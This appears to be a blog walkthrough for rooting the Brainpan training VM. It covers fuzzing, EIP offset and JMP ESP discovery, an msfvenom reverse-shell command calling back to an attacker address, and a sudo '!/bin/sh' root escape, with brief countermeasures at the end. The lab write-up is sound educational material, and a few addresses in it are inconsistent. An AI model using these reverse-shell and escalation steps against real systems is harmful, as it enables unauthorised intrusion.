Rooting Brainpan Walkthrough

Overview

Brainpan is B2R virtual machine designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise.

Vulnerabilities Exploited:

  • Buffer overlow in Brainpan server application
  • Sudo misconfiguration
  • Outdated/vulnerable command shell anansi_util

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Brainpan in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap
  • nc

Reconnaissance/Scanning

#netdiscover

Target VM IP Address: 192.168.8.103

nmap

# nmap -p- -sS -sV -A –webxml -oX brain-nmap.xml 192.168.8.103

Port 9999 is hosting a server, asking for password to authenticate.

Tried a couple of passwords, but could not succeed. Lets move forward on port 10000. It is webserver with a static page.

Found nothing fancy. Lets target web server with dirbuster

Found bin directory.

I downloaded, and executed brainpan.exe on my windows machine to examine behavior. My windows machine ip address is 192.168.8.100

Lets connect to this instance of brainpan,

So, we are confirm we have to crack this brainpan.exe binary to get access to system.

Lets check, if password is hardcoded in executable. We need to examin strings in executable.

On kali linux:

# wget http://192.168.8.102:10000/bin/brainpan.exe

# strings brainpan.exe > strings.txt

#cat strings.txt

Seems like “shitstorm” is actual password.

Yes, Access is granted, but program exit as well.

Writing Buffer Overflow Exploit

Lets find buffer overflow. If you are unfamiliar with writing buffer overflow exploits, please check corlan coder tutuials at https://www.corelan.be/

Step 1: Crash Target application through fuzzing.

Step 2: Find EIP Location

Step 3: Confirm EIP Location

Step 4: Find bad chars.

Step 5: Jump to shellcode instruction

Step 6: Generate shellcode payload with msfvenom and get reverse shell.

Step 7: Generate shellcode payload with msfvenom and get reverse shell for linux.

Step1: Crash Target application through fuzzing

We will fuzz target application by sending multiple of 100 characters string, and see whether server crashes?

Python script, that will fuzz target application.

Fuzzer in action…

Seems, we found buffer overflow, since application stopped responding after buffer length was 900.

Now, lets confirm by add just sending array of 900 characters, and observer, if application crashes

Yes, application crashed! Server brainpan applicaiton crashes with buffer length 900.

How can we analyze application further, and use buffer overflow to execute our own code on server? Using Immunity Debugger!

Immunity debugger, is mostly used by hackers for exploit writing and reverse engineering. You can download immunity debugger from official website by filling form at https://debugger.immunityinc.com/ID_register.py

After installation, run immunity debugger. Inside immunity debugger, Go to File->Open and locate brainpan executable. and start program by clicking play button in toolbar.

Again run step1.py to crash brainpan server application by writing buffer overflow.

Step 2: Find EIP Location

Modify step1.py to step2.py. Now, junk is our pattern, 900 bytes. and execute step2.py.

EIP is over written with 35724134, which is at 524 position from start of pattern.

Step 3: Confirm EIP Location

Lets confirm if 524 is correct position found by writing BBBB at 524 position.

Yes, confirmed EIP if overwritten with BBBB.

Step 4: Find bad chars

What are bad chars? Bad chars are those characters, when that are part of buffer overlow array/string, buffer overflow will not trigger. For example, strcpy will copy whole source string to destination string till it find a null character. With null character strcpy stops copying string from source to destination. In this case null char is bad char, because it hinder remaining chars string copying from source to destination string. Lets generate all characters with this python script.

So, i added allChars after string which is already overwriting EIP, 20 nops, and observed stack status.

I found, \x00 is bad char only. As you can see stack display all chars after 20 nops.

Step 5: Jump to shellcode instruction

As you can see, in above screenshot, ESP is pointing to stack, where our input buffer is written. If we overwrite eip with the “address of JMP ESP instruction” already in memory, program flow control will move execution to stack. Lets find JMP ESP instruction in Brainpan+Module Brianpan.

Instruction at memory address 311712f3, is JMP ESP. Writting this address in Littel Endian form,

EIP = “\xf3\x12\x17\31”

Step 6: Generate shellcode payload with msfvenom and get reverse shell.

msfvenom -a x86 –platform win -p windows/shell/reverse_tcp LHOST=192.168.8.102 LPORT=8080 -b ‘\x00’  -e x86/shikata_ga_nai -f python

add this shellcode to attacking script as:

 

#step6.py

And we received reverse shell!

Step 7: Generate shellcode payload with msfvenom and get reverse shell for linux

Now, it is time to generate shellcode for linux machine.

Adding linux reverse shell payload to attacking script

and received shell!

Priv Escalation

User puck is a sudo/privilege user, allowed to run anansi_util which is basically command shell, under developement and vulnerable to commands execution.

anansi_util is vulnerable to execute commands as root when run with sudo.

just add !/bin/sh and we are root.

Countermeasure:

  • Buffer overlow in Brainpan server application

Install patch for Brainpan server! 🙂 If brianpan is inhouse developed server application, then instead of strcpy use  strncpy. Is Brainpan using strcpy? Yes, i decompiled Brianpan using online website, and here is function. So, password length should be restricted to a certain maximum length.

  • Sudo misconfiguration

Do not provide sudo permission to vulnerable software

  • Outdated/vulnerable command shell anansi_util

Do not install vulnerable software on server

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s